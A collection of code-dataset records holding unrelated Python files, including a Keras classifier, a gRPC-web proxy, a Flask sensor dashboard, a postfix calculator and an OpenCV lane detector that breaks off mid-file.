open(out_fil, 'w', encoding='utf8', newline='') as fil:\n writer = csv.writer(fil, delimiter=delim)\n writer.writerow(header)\n ## data\n with open(out_fil, 'a', encoding='utf8', newline='') as fil:\n writer = csv.writer(fil, delimiter=delim)\n writer.writerow(output)\n","sub_path":"emon/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} {"seq_id":"521198576","text":"from keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Flatten, Activation\nfrom keras.layers.convolutional import Convolution2D, ZeroPadding2D, MaxPooling2D\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom keras import backend as K\nimport numpy as np\nimport pandas as pd\n\n#K.set_image_dim_ordering('th')\n#K.set_floatx('float32')\n\nnp.random.seed(17)\n\n\n''' data loading '''\nfolder_path = './data store/32x32/'\ndataType1 = np.load(folder_path+'imgToArrayType_1.npy')\ndataType2 = np.load(folder_path+'imgToArrayType_2.npy')\ndataType3 = np.load(folder_path+'imgToArrayType_3.npy')\n\ndataType1_ad = np.load(folder_path+'imgToArrayType_1_ad.npy')\ndataType2_ad = np.load(folder_path+'imgToArrayType_2_ad.npy')\ndataType3_ad = np.load(folder_path+'imgToArrayType_3_ad.npy')\n\n\nlabel1 = np.zeros((len(dataType1),), dtype = int)\nlabel2 = 
np.ones((len(dataType2),),dtype = int)\nlabel3 = np.ones((len(dataType3),),dtype = int) \nlabel3 += 1\n\nlabel1_ad = np.zeros((len(dataType1_ad),), dtype = int)\nlabel2_ad = np.ones((len(dataType2_ad),),dtype = int)\nlabel3_ad = np.ones((len(dataType3_ad),),dtype = int) \nlabel3_ad += 1\n\n\n\ndata = np.concatenate((dataType1,dataType1_ad,dataType2,dataType2_ad,dataType3,dataType3_ad),0)\nlabels = np.concatenate((label1,label1_ad,label2,label2_ad,label3,label3_ad),0)\ndata = data.astype('float32')\ndata = data/255\n\n\ndef create_model(opt_='adamax'):\n model = Sequential()\n model.add(Convolution2D(4, 3, 3, activation='relu', input_shape=(32, 32,3))) #use input_shape=(3, 64, 64)\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Convolution2D(8, 3, 3, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(0.2))\n \n model.add(Flatten())\n model.add(Dense(12, activation='tanh'))\n model.add(Dropout(0.1))\n model.add(Dense(3, activation='softmax'))\n\n model.compile(optimizer=opt_, loss='sparse_categorical_crossentropy', metrics=['accuracy']) \n return model\n\ndef cleanImages():\n datagen = ImageDataGenerator(rotation_range=0.3, zoom_range=0.3)\n datagen.fit(data)\n return datagen\n\ndef fitAndPredict():\n print(\"cleaning images\")\n datagen=cleanImages()\n print(\"images cleaned\")\n K.set_image_data_format('channels_last')\n model = create_model()\n x_train,x_val_train,y_train,y_val_train = train_test_split(data,labels,test_size=0.4, random_state=17)\n print(\"fitting data\")\n model.fit_generator(datagen.flow(x_train,y_train, batch_size=15, shuffle=True), nb_epoch=200, samples_per_epoch=len(x_train), verbose=2, \n \tvalidation_data=(x_val_train, y_val_train))\n #print(\"data fitted in model\")\n #test_data = np.load('test.npy')\n #test_id = np.load('test_id.npy')\n #print(\"creating predictions\")\n #predictions = model.predict_proba(test_data)\n #print(\"predictions made\")\n return #predictions\n\ndef createSub():\n pred=fitAndPredict()\n #print(\"creating submission file\")\n #df = pd.DataFrame(pred, columns=['Type_1','Type_2','Type_3'])\n #df['image_name'] = test_id\n #df.to_csv('submission.csv', index=False)\n #print(\"submission created\")\n\n\nif __name__ == '__main__':\n \n createSub()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} {"seq_id":"126190155","text":"from torch.utils.data import DataLoader\nfrom torch.utils.data.dataset import Subset\nfrom torchvision import datasets\nfrom torchvision import transforms\nimport torch\n\ndef get_dataloader(type='cifar10', data_root='../data', batch_size=16):\n '''\n Return: train, valid and test data loader. 
Each loader contains (data, label) pairs\n '''\n if type == 'cifar10':\n train_indices = torch.arange(0, 48000)\n valid_indices = torch.arange(48000, 50000)\n train_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n test_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010]),])\n train_and_valid = datasets.CIFAR10(root=data_root, train=True, transform=train_transform, download=False)\n train_dataset = Subset(train_and_valid, train_indices)\n valid_dataset = Subset(train_and_valid, valid_indices)\n test_dataset = datasets.CIFAR10(root=data_root, train=False, transform=test_transform, download=False)\n train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n valid_loader = DataLoader(dataset=valid_dataset, batch_size=batch_size, shuffle=False)\n test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n return train_loader, valid_loader, test_loader","sub_path":"ResNet18/net/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} {"seq_id":"123184386","text":"from asyncio import Event, get_event_loop\nfrom base64 import b64encode, b64decode\nfrom functools import wraps\nfrom struct import pack, unpack\nfrom urllib.parse import urlparse\n\nimport grpc\nfrom math import ceil\nfrom quart import Quart, request\n\nUNCOMPRESSED = 0x00\nCOMPRESSED = 0x01\n\nMESSAGE = 0x00\nTRAILERS = 0x80\n\n\ndef bytes_generator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n return b''.join(func(*args, **kwargs))\n return wrapper\n\n\n@bytes_generator\ndef encode(*messages):\n for message in messages:\n if isinstance(message, dict):\n message = b''.join(f'{key}:{value}\\r\\n'.encode('ascii') for key, value in message.items())\n message_type = TRAILERS\n else:\n message_type = MESSAGE\n\n compressed_flag = bytes([message_type | UNCOMPRESSED])\n message_length = pack('>I', len(message))\n yield b64encode(compressed_flag + message_length + message)\n\n\nclass StreamDecoder:\n def __init__(self, data):\n self.data = data\n self.buffer = bytearray()\n\n def __getitem__(self, idx):\n if isinstance(idx, int):\n idx = slice(idx, idx + 1, 1)\n elif idx.start and idx.start < 0:\n raise ValueError('Start must be non-negative')\n elif idx.step and idx.step < 1:\n raise ValueError('Step must be positive')\n elif not idx.stop or idx.stop < 0:\n raise ValueError('Stop must be non-negative')\n\n distance = idx.stop - len(self.buffer)\n if distance > 0:\n cutoff = 4 * ceil(distance / 3)\n data, self.data = self.data[:cutoff], self.data[cutoff:]\n self.buffer += b64decode(data)\n\n if len(data) < cutoff or len(self.buffer) < idx.stop:\n raise ValueError('Unexpected end of data')\n\n return bytes(self.buffer[idx])\n\n @property\n def has_data(self):\n return bool(self.data)\n\n def flush(self):\n self.buffer = bytearray()\n\n\ndef list_generator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n return list(func(*args, **kwargs))\n return wrapper\n\n\n@list_generator\ndef decode(data):\n base64_decoder = StreamDecoder(data)\n while base64_decoder.has_data:\n base64_decoder.flush()\n\n compressed_flag, message_length = base64_decoder[0], base64_decoder[1:5]\n compressed_flag = compressed_flag[0]\n message_length = unpack('>I', message_length)[0]\n\n if compressed_flag == COMPRESSED:\n raise 
NotImplementedError\n\n message = base64_decoder[5:5 + message_length]\n if compressed_flag & TRAILERS:\n message = message.decode('ascii').rstrip()\n yield dict(entry.split(':', maxsplit=1) for entry in message.split('\\r\\n'))\n else:\n yield message\n\n\ndef cors(request_headers, allowed_origins=None):\n response_headers = {}\n\n if 'access-control-request-method' in request_headers:\n response_headers['access-control-allow-methods'] = 'POST'\n\n if 'access-control-request-headers' in request_headers:\n headers = request_headers['access-control-request-headers'].split(',')\n response_headers['access-control-allow-headers'] = ','.join(\n standard_headers() |\n grpc_headers(headers) |\n grpc_web_client_headers())\n\n if 'origin' in request_headers:\n if allowed_origins:\n origin = request_headers['origin']\n if urlparse(origin).netloc in allowed_origins:\n response_headers['access-control-allow-origin'] = origin\n else:\n response_headers['access-control-allow-origin'] = '*'\n\n response_headers['access-control-expose-headers'] = ','.join(\n grpc_headers(request_headers.keys()) |\n grpc_web_server_headers())\n response_headers['access-control-max-age'] = '600'\n\n return response_headers\n\n\ndef standard_headers():\n return {'content-type'}\n\n\ndef grpc_headers(headers):\n return {header for header in headers if header.islower()} - grpc_web_client_headers() - standard_headers()\n\n\ndef grpc_web_client_headers():\n return {'x-grpc-web',\n 'x-user-agent',\n 'x-accept-content-transfer-encoding',\n 'x-accept-response-streaming',\n 'grpc-timeout'}\n\n\ndef grpc_web_server_headers():\n return {'grpc-status',\n 'grpc-message'}\n\n\ndef proxy(target,\n credentials=None,\n options=None,\n allowed_origins=None,\n max_timeout=20,\n max_message_size=1024 * 1024 * 4):\n app = Quart('grpcio-helpers')\n if credentials:\n channel = grpc.secure_channel(target, credentials, options)\n else:\n channel = grpc.insecure_channel(target, (options or []) + [\n ('grpc.max_send_message_length', max_message_size),\n ('grpc.max_receive_message_length', max_message_size)\n ])\n\n @app.route('/<service>/<method>', methods=['POST', 'OPTIONS'])\n async def handler(service, method):\n if request.method == 'OPTIONS':\n return b'', 204, cors(request.headers, allowed_origins)\n elif not request.headers.get('content-type', '').startswith('application/grpc'):\n return b'', 415\n\n timeout = min(float(request.headers.get('grpc-timeout', 'inf')), max_timeout)\n request_message = decode(await request.get_data())[0]\n request_metadata_keys = grpc_headers(request.headers)\n request_metadata = [(key, request.headers[key]) for key in request_metadata_keys]\n caller = channel.unary_unary(f'/{service}/{method}')\n future = caller.future(request_message, timeout=timeout, metadata=request_metadata)\n\n loop = get_event_loop()\n done = Event()\n future.add_done_callback(lambda _: loop.call_soon_threadsafe(done.set))\n await done.wait()\n\n headers = {\n **cors(request.headers, allowed_origins),\n **dict(future.initial_metadata()),\n 'content-type': 'application/grpc-web-text+proto'}\n trailers = {\n **dict(future.trailing_metadata()),\n **{'grpc-status': str(future.code().value[0]),\n 'grpc-message': future.details() or future.code().name}}\n\n if future.exception():\n return b'', 200, {**headers, **trailers}\n else:\n return encode(future.result(), trailers), 200, headers\n\n return 
app\n","sub_path":"grpc_helpers/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"331321783","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include # url()\nfrom django.views.generic import TemplateView\n\nfrom accounts.views import (\n login_view,\n logout_view,\n register_view,\n)\n\nfrom post.views import (\n home_view,\n tweets_list_view,\n tweets_detail_view,\n)\n\nurlpatterns = [\n path('', home_view),\n path('admin/', admin.site.urls),\n path('global/', tweets_list_view),\n path('login/', login_view),\n path('logout/', logout_view),\n path('register/', register_view),\n path('', tweets_detail_view),\n re_path(r'profiles?/', include('profiles.urls')),\n path('api/tweets/', include('post.api.urls')),\n re_path(r'api/profiles?/', include('profiles.api.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, \n document_root=settings.STATIC_ROOT)","sub_path":"blackpost/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"462682805","text":"import pandas as pd\nimport numpy as np\nfrom functools import partial\n\n\ndef get_ATR(data, periods):\n TR = pd.DataFrame({'A': (data['high'] - data['low']),\n 'B': (data['high'] - data['close']).abs(),\n 'C': (data['low'] - data['close']).abs()\n })\n TR['TR'] = TR.max(axis=1)\n TR['ATR'] = TR['TR'].ewm(span=periods).mean()\n #TR['ATR'] = TR['TR'].rolling(periods).mean()\n return TR.ATR\n\n\ndef get_std(data, periods):\n returns = np.log(data.avg_price.pct_change()+1)\n return returns.rolling(periods).std() * data.avg_price\n\n\ndef get_min_max(data, period):\n return pd.DataFrame({\n 'max': (data - data.shift(1).rolling(period).max()) > 0,\n 'min': (data.shift(1).rolling(period).min() - data) > 0\n })\n\n\ndef majority_function(data):\n return (\n 0.5 + ((data.sum(axis=1) - 0.5) / data.count(axis=1))).apply(np.floor)\n\n\ndef get_min_max_df(data, periods, func=get_min_max):\n min_max_func = partial(func, data)\n mins = pd.DataFrame()\n maxs = pd.DataFrame()\n for period in periods:\n df = min_max_func(period)\n mins[period] = df['min']\n maxs[period] = df['max']\n return {'min': mins,\n 'max': maxs}\n\n\ndef get_signals(data, periods, func=get_min_max_df):\n min_max = func(data, periods)\n # return min_max['min']\n\n return pd.DataFrame({\n 'signal': majority_function(min_max['max']) - majority_function(min_max['min'])\n })\n","sub_path":"indicators.py","file_name":"indicators.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"531971572","text":"\"\"\"\nPython Lotame API wrapper.\n==========================\nFilename: lotame.py\nAuthor: Paulo Kuong\nEmail: pkuong80@gmail.com\nPython Version: 3.6.1\n\nPlease refer to https://api.lotame.com/docs/#/ to get all Endpoints.\nPlease refer to README (https://github.com/paulokuong/lotame) for examples.\n\"\"\"\nfrom lotame.lotame import Lotame\n\n\nif __name__ == '__main__':\n l = Lotame(username='xxxx', password='yyyy')\n\n # Search audiences\n audiences = l.get('audiences/search',\n searchTerm='Age - ').json()['Audience']\n\n # Get behavior 3333\n behavior = l.get('behaviors/{}'.format(3333)).json()\n\n # Create audience segment 
with 3 behaviors.\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 5',\n 2215, [[6322283, 6322292], [6322283, 6322292]],\n 'Testing out Lotame API 5')\n post_response_json = l.post('audiences', audience_definition).json()\n print(post_response_json)\n\n # Create audience segment with 3 behaviors for (My Profile)\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 5',\n 2215, [[6322283, 6322292, 1111760, 6322303],\n [6322283, 6322292, 1111760, 6322303]],\n 'Testing out Lotame API 5', overlap=True)\n\n # Create audience segment with 3 behaviors for (All Profile)\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 5',\n 2215, [[6322283, 6322292, 1111760, 6322303],\n [6322283, 6322292, 1111760, 6322303]],\n 'Testing out Lotame API 5', overlap=False)\n\n # Getting Reach Estimate (Note that description param is removed\n # since it is not valid param)\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 8',\n 2215, [[6322283, 6322292, 1111760, 6322303],\n [6322283, 6322292, 1111760, 6322303]])\n reach_estimates = l.post(\n 'audiences/reachEstimates', audience_definition).json()\n reach_estimates_res = l.get(\n 'audiences/reachEstimates/{}'.format(reach_estimates.get('id')))\n print(reach_estimates_res.json())\n\n # Getting behaviors under hierarchy tree at depth 2 child nodes.\n [{'name': j['name'], 'behavior_id':j['behaviorId']}\n for j in l.get('hierarchies/525000', depth=2).json().get(\n 'nodes')[1].get('childNodes')]\n","sub_path":"py/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"5948726","text":"import operator #make use of operator module to perform arithmetic operations\nimport decimal #make use of decimal module to convert string to decimal\n\n# class Empty to raise an exception code from the book \"Data Structure and Algorithms in Python\"\nclass Empty(Exception):\n \"\"\"Error attempting to access an element from an empty container.\"\"\"\n pass\n\n# class ArrayStack code from chapter6.1 in the book \"Data Structure and Algorithms in Python\"\nclass ArrayStack:\n \"\"\"LIFO Stack implementation using a Python list as underlying stoarge.\"\"\"\n \n def __init__(self):\n \"\"\"Create an empty stack.\"\"\"\n self._data=[] # nonpublic list instance\n \n \"\"\"--str-- method to return elements in Array\"\"\"\n def __str__(self):\n return ' '.join(map(str, self._data))\n \n def __len__(self):\n \"\"\"Return the number of elements in the stack.\"\"\"\n return len(self._data)\n \n def is_empty(self):\n \"\"\"Return True if the stack is empty.\"\"\"\n return len(self._data)==0\n \n def push(self,e):\n \"\"\"Add element e to the top of the stack.\"\"\"\n self._data.append(e) # new item stored at the end of list\n \n def top(self):\n \"\"\"Return (but do not remove) the element at the top of the stack.\n \n Raise Empty exception if the stack is empty.\n \"\"\"\n \n if self.is_empty():\n raise Empty('Stack is empty')\n return self._data[-1]\n \n def pop(self):\n \"\"\"Remove and return the element fomr the top of the stack (i.e., LIFO)\n \n Raise Empty exception if the stack is empty.\n \"\"\"\n \n if self.is_empty():\n raise Empty('Stack is empty')\n return self._data.pop() #remove last item from list\n \n#function to perform calculation based on postfix notations\n\ndef postfix_calc(expr):\n\n operands = '+-*/' #allowable operands\n \n S = ArrayStack() #create a stack\n \n 
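# Worked example (illustrative note added here; not in the original file): for the\n # input '3 4 + 2 *', the loop below pushes 3 and 4, '+' pops them and pushes 7,\n # then 2 is pushed, and '*' pops 7 and 2, leaving 14 as the final result.\n 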
expr = expr.split(\" \") #save string into a list, split by a space\n \n for c in range(len(expr)): #go over each element in the list\n \n if expr[c] not in operands:\n #If the element is number, add it to the stack\n S.push(expr[c])\n \n elif expr[c] in operands:\n #If the element is an operator, perform that operation given the latest two elements in the stack\n #Given stack is a LIFO, the last element in stack is popped as expression 2, followed by another pop for expression 1\n expr2 = decimal.Decimal(S.pop())\n expr1 = decimal.Decimal(S.pop())\n\n if expr[c]=='+':\n #if '+', then add expr2 to expr1, then push the result to the stack\n S.push(operator.add(expr1, expr2))\n \n elif expr[c]=='-':\n #if '-', then subtract expr2 from expr1, then push the result to the stack\n S.push(operator.sub(expr1, expr2))\n \n elif expr[c]=='*':\n #if '*', then multiply expr1 with expr1, then push the result to the stack\n S.push(operator.mul(expr1, expr2))\n \n elif expr[c]=='/':\n #if '/', then divide expr1 with expr2, then push the result to the stack\n S.push(operator.truediv(expr1, expr2))\n \n return S.pop() #pop the last element in the stack, which is the final outcome\n \n\n# Specify output file path and filename\ninput_file_path = \"/Users/plodium2000/Documents/All Documents/Profile/EM/Education/Berkeley/MIDS Program/Courses/Data Structure and Algorithm/1B_assignments_2016_11_10/Assignment_4/Wongnophadol_week4/input.txt\"\n\n# Specify output file path and filename\noutput_file_path = \"/Users/plodium2000/Documents/All Documents/Profile/EM/Education/Berkeley/MIDS Program/Courses/Data Structure and Algorithm/1B_assignments_2016_11_10/Assignment_4/Wongnophadol_week4/output.txt\"\n\n# Read the input file and write out scrambled message of each line into the output file.\nwith open(input_file_path,'rt') as input_file, open(output_file_path,'wt') as output_file:\n for line in input_file:\n # Print statements to quickly test the accuracy of the program.\n print(line.rstrip())\n print(str(postfix_calc(line.rstrip()))+\"\\n\")\n \n # Write out the scrambled messages to the output file.\n output_file.write(str(postfix_calc(line.rstrip()))+\"\\n\")\n ","sub_path":"Data Structure and Algorithm/Assignment_4/Wongnophadol_week4/postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"625488162","text":"from flask import Flask\nfrom flask import flash, render_template, request, redirect, send_from_directory, jsonify\nimport MySQLdb\nimport os\nfrom datetime import datetime, timedelta\nfrom collections import OrderedDict\nimport json\n\napplication = Flask(__name__)\nsensorMac = \"b8:27:eb:54:2c:38\"\nconfig = {\"height\": 80, \"floors\": {4: {\"ec:fa:bc:e:a6:95_1\": \"general\", \"ec:fa:bc:e:a6:95_2\": \"general\", \"ec:fa:bc:e:a6:95_3\": \"glass\", \"ec:fa:bc:e:a6:95_4\": \"paper\"}}}\nra_config = {\"floors\": {4: {sensorMac: \"general\"}}}\n\n@application.route(\"/\")\ndef index():\t\n templateData = get_template_data()\n return render_template('index.html', **templateData)\n\n\n@application.route(\"/ra\")\ndef ra():\n templateData = get_ra_template_data()\n return render_template('roomavailability.html', **templateData)\n\n\n@application.route(\"/rs\")\ndef rs():\n templateData = get_ra_template_data()\n return render_template('roomstatus.html', **templateData)\n\n\ndef from_date(time_scale):\n # WIP: while sensors are offline, we are using old data\n # datetime_now = 
datetime.now()\n datetime_now = datetime(2018, 9, 23, 10, 13, 13)\n if time_scale == \"month\":\n min_date = datetime_now - timedelta(days=30)\n elif time_scale == \"week\":\n min_date = datetime_now - timedelta(days=7)\n elif time_scale == \"3_days\":\n min_date = datetime_now - timedelta(days=3)\n else:\n min_date = datetime_now - timedelta(days=1)\n return min_date\n\n\n@application.route('/ra/date/', methods=['POST'])\ndef get_ra_graph_data():\n time_scale = request.form.get(\"time_scale\", \"month\")\n data = get_ra_template_data(from_date(time_scale))\n data = {\"time_scale\": json.dumps(data)}\n data = jsonify(data)\n return data\n\n\n@application.route('/date/', methods=['POST'])\ndef get_graph_data():\n time_scale = request.form.get(\"time_scale\", \"month\")\n data = get_template_data(from_date(time_scale))\n data = {\"time_scale\": json.dumps(data)}\n data = jsonify(data)\n return data\n\n\n@application.route('/static/<path:path>')\ndef send_ota(path):\n return send_from_directory('static', path)\n\n\ndef get_ra_template_data(date=None):\n template_data = {'ra_config': ra_config}\n user = \"remote-admin\"\n passwd = \"Some-pass!23\"\n db_host = os.environ[\"MYSQL_SERVICE_HOST\"]\n db_name = \"room-availability\"\n db = MySQLdb.connect(host=db_host, user=user, passwd=passwd, db=db_name)\n cur = db.cursor()\n if date is None:\n mysql_string = \"SELECT * FROM `sensor_data` ORDER BY timestamp DESC LIMIT 20\"\n else:\n mysql_string = \"SELECT * FROM `sensor_data` WHERE timestamp > '{}' ORDER BY timestamp DESC\".format(date)\n cur.execute(mysql_string)\n db_data = cur.fetchall()\n parsed_data = OrderedDict()\n for (id, mac_id, data, datetime_object) in db_data:\n date_time = datetime_object.strftime(\"%Y-%m-%d %H:%M:%S\")\n if date_time in parsed_data:\n parsed_data[date_time].update({mac_id: {\"data\": data}})\n else:\n parsed_data.update({ date_time: {mac_id: {\"data\": data}}})\n filtered_data = OrderedDict()\n for i in parsed_data:\n #if len(parsed_data[i]) == 1:\n filtered_data.update({i: parsed_data[i]})\n data_dictionary = OrderedDict(sorted(filtered_data.items()))\n if data_dictionary.get(next(reversed(data_dictionary))).get(sensorMac).get('data') == 1.0:\n template_data['status'] = \"RoomIsBusy\"\n else:\n template_data['status'] = \"RoomIsFree\"\n template_data['busyness_data'] = data_dictionary\n return template_data\n\n\ndef get_template_data(date=None):\n templateData = {'config': config}\n user = \"remote-admin\"\n passwd = \"Some-pass!23\"\n bin_height = config[\"height\"]\n db_host = os.environ[\"MYSQL_SERVICE_HOST\"]\n db_name = \"smart-recycling-bins\"\n db = MySQLdb.connect(host=db_host, user=user, passwd=passwd, db=db_name)\n cur = db.cursor()\n# cur.execute(\"\"\"SELECT * FROM `sensor_data` WHERE timestamp < '2018-08-06 09:38:40' ORDER BY timestamp DESC LIMIT 200\"\"\")\n mac_ids = \"('{}')\".format(\"','\".join(config['floors'][4].keys()))\n if date is None:\n mysql_string = \"SELECT * FROM `sensor_data` WHERE `macid` IN {} ORDER BY timestamp DESC LIMIT 1000\".format(mac_ids)\n else:\n mysql_string = \"SELECT * FROM `sensor_data` WHERE timestamp > '{}' AND `macid` IN {} ORDER BY timestamp DESC\".format(date, mac_ids)\n cur.execute(mysql_string)\n data = cur.fetchall()\n parsed_data = OrderedDict()\n fallback_values = {}\n for (id, mac_id, distance, datetime_object) in data:\n # if sensor reported value above 5 cm - record the value so we can fall back to last \"good\" one in case it's below 5\n if distance > 5:\n fallback_values[mac_id] = distance\n else:\n distance = 
fallback_values[mac_id]\n\n date_time = datetime_object.strftime(\"%Y-%m-%d %H:%M:%S\")\n # reserve the height with bin height from config\n trash_height = bin_height - distance\n if trash_height < 0:\n trash_height = 0\n if date_time in parsed_data:\n parsed_data[date_time].update({mac_id: {\"trash_height\": trash_height}})\n else:\n parsed_data.update({date_time: {mac_id: {\"trash_height\": trash_height}}})\n filtered_data = OrderedDict()\n for i in parsed_data:\n if len(parsed_data[i]) == 4:\n filtered_data.update({i: parsed_data[i]})\n\n templateData['distance_data'] = OrderedDict(sorted(filtered_data.items()))\n return templateData\n\n\n@application.route(\"/db\")\ndef db_records():\n user = \"remote-admin\"\n passwd = \"Some-pass!23\"\n db_host = os.environ[\"MYSQL_SERVICE_HOST\"]\n db_name = \"smart-recycling-bins\"\n db = MySQLdb.connect(host=db_host, user=user, passwd=passwd, db=db_name)\n cur = db.cursor()\n mysql_string = \"SELECT * FROM (SELECT * FROM `sensor_data` ORDER BY id DESC LIMIT 100) sub ORDER BY id DESC\"\n cur.execute(mysql_string)\n data = list(cur.fetchall())\n parsed_data = []\n for (id, mac_id, distance, datetime_object) in data:\n parsed_data.append((id, mac_id, distance, datetime_object.strftime(\"%Y-%m-%d %H:%M:%S\")))\n return render_template('db.html', data=parsed_data)\n\n\nif __name__ == \"__main__\":\n application.run(debug=True)\n","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"536511332","text":"import util\r\n\r\ndef is_valid(number):\r\n digits = str(number)\r\n valid = False\r\n\r\n for i in range(5):\r\n if digits[i] > digits[i + 1]:\r\n return False\r\n\r\n if digits[i] == digits[i + 1]:\r\n valid = True\r\n\r\n return valid\r\n\r\n\r\n[low, high] = list(map(int, util.read_line(\"input/04.txt\").split(\"-\")))\r\n\r\nresult = sum(1 for num in range(low, high + 1) if is_valid(num))\r\nprint(result)\r\n","sub_path":"04a.py","file_name":"04a.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"607152467","text":"import math\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\n\r\nclass Detect_Draw_lanes():\r\n def __init__(self,image):\r\n self.input_image=image\r\n self.lines=None\r\n self.vertices_img=None\r\n\r\n def region_of_interest(self,img):\r\n \"\"\"\r\n Applies an image mask.\r\n \"\"\"\r\n #defining a blank mask\r\n mask = np.zeros_like(img) \r\n #checking number of image channel(color/grayscale) and applying mask\r\n if len(img.shape) > 2:\r\n ignore_mask_color = (255,255,255)\r\n else:\r\n ignore_mask_color = 255\r\n #filling color to pixels inside the polygon \r\n cv2.fillPoly(mask, self.vertices_img, ignore_mask_color)\r\n #image where mask pixels are nonzero\r\n masked_image = cv2.bitwise_and(img, mask)\r\n #cv2.imshow('',masked_image)\r\n return masked_image\r\n\r\n def makeLeftRightline(self):\r\n \"\"\"\r\n find left and right lane coefficients\r\n \"\"\"\r\n left_lines = []\r\n right_lines = []\r\n for i in self.lines:\r\n for x1,y1,x2,y2 in i:\r\n if x1 == x2:\r\n #Vertical Lines\r\n pass\r\n else:\r\n m = (y2 - y1) / (x2 - x1)\r\n c = y1 - m * x1\r\n if m < 0:\r\n left_lines.append((m,c))\r\n elif m >= 0:\r\n right_lines.append((m,c))\r\n return left_lines,right_lines\r\n\r\n def slope_lines(self,image):\r\n \"\"\"\r\n find mean 
left and right lane\r\n \"\"\"\r\n img_copy = image.copy()\r\n \r\n left_lines,right_lines=self.makeLeftRightline()\r\n left_line = np.mean(left_lines, axis=0)\r\n right_line = np.mean(right_lines, axis=0)\r\n\r\n poly_vertices = []\r\n order = [0,1,3,2]\r\n\r\n # DRAWING LINES AND PATH ON THE IMAGE\r\n thickness_of_line=9\r\n color_of_line=[20, 255, 20]\r\n lane_lines = []\r\n\r\n for slope, intercept in [left_line, right_line]:\r\n #getting height of image in y1\r\n rows, cols = image.shape[:2]\r\n y1= int(rows) \r\n #taking y2 upto 68% of y1\r\n y2= int(rows*0.68) \r\n #y=mx +c can be written as x=(y-c)/m\r\n x1=int((y1-intercept)/slope)\r\n x2=int((y2-intercept)/slope)\r\n poly_vertices.append((x1, y1))\r\n poly_vertices.append((x2, y2))\r\n # collect the current line so both the left and the right lane get drawn\r\n lane_lines.append([[x1,y1,x2,y2]])\r\n\r\n lines=np.array(lane_lines)\r\n for i in lines:\r\n for x1,y1,x2,y2 in i:\r\n cv2.line(img_copy, (x1, y1), (x2, y2), color_of_line, thickness_of_line)\r\n poly_vertices = [poly_vertices[i] for i in order]\r\n #filling polygon color\r\n cv2.fillPoly(img_copy, pts = np.array([poly_vertices],'int32'), color = (200,20,20))\r\n final_out=cv2.addWeighted(image,0.7,img_copy,0.4,0.)\r\n return final_out\r\n\r\n def hough_lines(self,img, rho, theta, threshold, min_line_len, max_line_gap):\r\n \"\"\" \r\n Returns an image with hough lines drawn.\r\n \"\"\"\r\n self.lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\r\n # Returns a nested list with x1,x2,y1,y2 which are further used to detect the slope and intercept for each line\r\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\r\n line_img = self.slope_lines(line_img)\r\n #cv2.imshow(line_img)\r\n return line_img\r\n\r\n def main(self): \r\n #Grayscale\r\n image=self.input_image\r\n gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\r\n #Gaussian Smoothing\r\n smoothed_img = cv2.GaussianBlur(gray_img, (5, 5), 0)\r\n #Canny Edge Detection\r\n canny_img = cv2.Canny(smoothed_img, 180, 240)\r\n\r\n # defining vertices of image\r\n rows, cols = image.shape[:2]\r\n bottom_left = [cols*0.15, rows]\r\n top_left = [cols*0.45, rows*0.6]\r\n bottom_right = [cols*0.95, rows]\r\n top_right = [cols*0.55, rows*0.6] \r\n self.vertices_img = np.array([[bottom_left, top_left, top_right, bottom_right]], dtype=np.int32)\r\n\r\n #Masked Image Within a Polygon\r\n 